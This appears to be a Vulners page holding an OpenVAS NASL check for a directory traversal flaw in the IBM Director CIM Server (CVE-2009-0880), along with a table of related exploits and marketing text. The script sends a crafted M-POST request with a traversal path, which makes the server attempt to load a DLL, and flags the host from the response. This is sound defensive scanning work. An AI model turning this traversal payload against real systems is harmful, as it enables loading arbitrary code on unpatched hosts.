| Reporter | Title | Published | Views | Family All 18 |
|---|---|---|---|---|
| IBM System Director Remote System Level Exploit | 2 Dec 201200:00 | – | zdt | |
| IBM System Director Agent DLL Injection Vulnerability | 7 Dec 201200:00 | – | zdt | |
| CVE-2009-0880 | 12 Mar 200915:00 | – | cve | |
| CVE-2009-0880 | 12 Mar 200915:00 | – | cvelist | |
| IBM System Director Agent - Remote System Level | 2 Dec 201200:00 | – | exploitdb | |
| IBM System Director Agent - DLL Injection (Metasploit) | 7 Dec 201200:00 | – | exploitdb | |
| IBM System Director Agent - Remote System Level | 2 Dec 201200:00 | – | exploitpack | |
| KLA10198 Multiple vulnerabilities in IBM Director | 12 Mar 200900:00 | – | kaspersky | |
| IBM System Director Agent DLL Injection | 6 Dec 201215:43 | – | metasploit | |
| CVE-2009-0880 | 12 Mar 200915:20 | – | nvd |
###############################################################################
# OpenVAS Vulnerability Test
# $Id: gb_ibm_director_cimlistener_dir_trav_vuln.nasl 7552 2017-10-24 13:00:36Z cfischer $
#
# IBM Director CIM Server CIMListener Directory Traversal Vulnerability (Windows)
#
# Authors:
# Sharath S <[email protected]>
#
# Copyright:
# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
tag_impact = "Successful exploitation will allow remote attackers to traverse the file
system and specify any library on the system.
Impact Level: Application";
tag_affected = "IBM Director version 5.20.3 Service Update 1 and prior";
tag_insight = "The flaw is due to error in IBM Director CIM Server, which allow remote
attackers to load and execute arbitrary local DLL code via a .. (dot dot)
in a /CIMListener/ URI in an M-POST request.";
tag_solution = "Upgrade to IBM Director version 5.20.3 Service Update 2 or later,
https://www14.software.ibm.com/webapp/iwm/web/reg/download.do?source=dmp&S_PKG=director_x_520&S_TACT=sms&lang=en_US&cp=UTF-8";
tag_summary = "The host is running IBM Director CIM Server and is prone to
directory traversal vulnerability.";
if(description)
{
script_id(802684);
script_version("$Revision: 7552 $");
script_cve_id("CVE-2009-0880");
script_bugtraq_id(34065);
script_tag(name:"cvss_base", value:"6.8");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:M/Au:N/C:P/I:P/A:P");
script_tag(name:"last_modification", value:"$Date: 2017-10-24 15:00:36 +0200 (Tue, 24 Oct 2017) $");
script_tag(name:"creation_date", value:"2012-12-11 20:37:46 +0530 (Tue, 11 Dec 2012)");
script_name("IBM Director CIM Server CIMListener Directory Traversal Vulnerability (Windows)");
script_tag(name:"qod_type", value:"remote_vul");
script_category(ACT_ATTACK);
script_copyright("Copyright (C) 2012 Greenbone Networks GmbH");
script_family("General");
script_dependencies("find_service.nasl", "http_version.nasl", "os_detection.nasl");
script_require_ports("Services/www", 6988);
script_mandatory_keys("Host/runs_windows");
script_tag(name : "impact" , value : tag_impact);
script_tag(name : "affected" , value : tag_affected);
script_tag(name : "insight" , value : tag_insight);
script_tag(name : "solution" , value : tag_solution);
script_tag(name : "summary" , value : tag_summary);
script_xref(name : "URL" , value : "http://secunia.com/advisories/34212");
script_xref(name : "URL" , value : "http://www.exploit-db.com/exploits/23074/");
script_xref(name : "URL" , value : "https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20090305-2_IBM_director_privilege_escalation.txt");
script_xref(name : "URL" , value : "https://www14.software.ibm.com/webapp/iwm/web/reg/download.do?source=dmp&S_PKG=director_x_520&S_TACT=sms&lang=en_US&cp=UTF-8");
exit(0);
}
include("http_func.inc");
include("host_details.inc");
include("version_func.inc");
# variable initialization
cimPort = 0;
sndReq = "";
rcvRes = "";
cimPort = get_http_port(default:6988);
## xmlscript
xmlscript = string(
'<?xml version="1.0" encoding="utf-8" ?>' +
'<CIM CIMVERSION="2.0" DTDVERSION="2.0">' +
' <MESSAGE ID="1007" PROTOCOLVERSION="1.0">' +
' <SIMPLEEXPREQ>' +
' <EXPMETHODCALL NAME="ExportIndication">' +
' <EXPPARAMVALUE NAME="NewIndication">' +
' <INSTANCE CLASSNAME="CIM_AlertIndication" >' +
' <PROPERTY NAME="Description" TYPE="string">' +
' <VALUE>Sample CIM_AlertIndication indication</VALUE>' +
' </PROPERTY>' +
' </INSTANCE>' +
' </EXPPARAMVALUE>' +
' </EXPMETHODCALL>' +
' </SIMPLEEXPREQ>' +
' </MESSAGE>' +
'</CIM>');
## construct IBM Director M-POST request
sndReq = string("M-POST /CIMListener/\\..\\..\\..\\..\\..\\mydll HTTP/1.1\r\n" ,
"Host: " , get_host_name() , "\r\n" ,
"Content-Type: application/xml; charset=utf-8\r\n" ,
"Content-Length: " , strlen(xmlscript) , "\r\n" ,
"Man: http://www.dmtf.org/cim/mapping/http/v1.0 ; ns=40\r\n" ,
"CIMOperation: MethodCall\r\n" ,
"CIMExport: MethodRequest\r\n" ,
"CIMExportMethod: ExportIndication\r\n",
"\r\n" , xmlscript , "\r\n");
## send request and get response
rcvRes = http_send_recv(port:cimPort, data:sndReq);
## check response to confirm the vulnerability
if(rcvRes && rcvRes =~ "HTTP\/1\.[0-9] 200 OK" && "CIMExport: " >< rcvRes &&
"Cannot load module " >< rcvRes && "Unknown exception" >< rcvRes &&
"Cannot initialize consumer due to security restrictions" >!< rcvRes &&
"Cannot load outside cimom/bin" >!< rcvRes && "CIM CIMVERSION=" >< rcvRes)
{
security_message(cimPort);
exit(0);
}
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation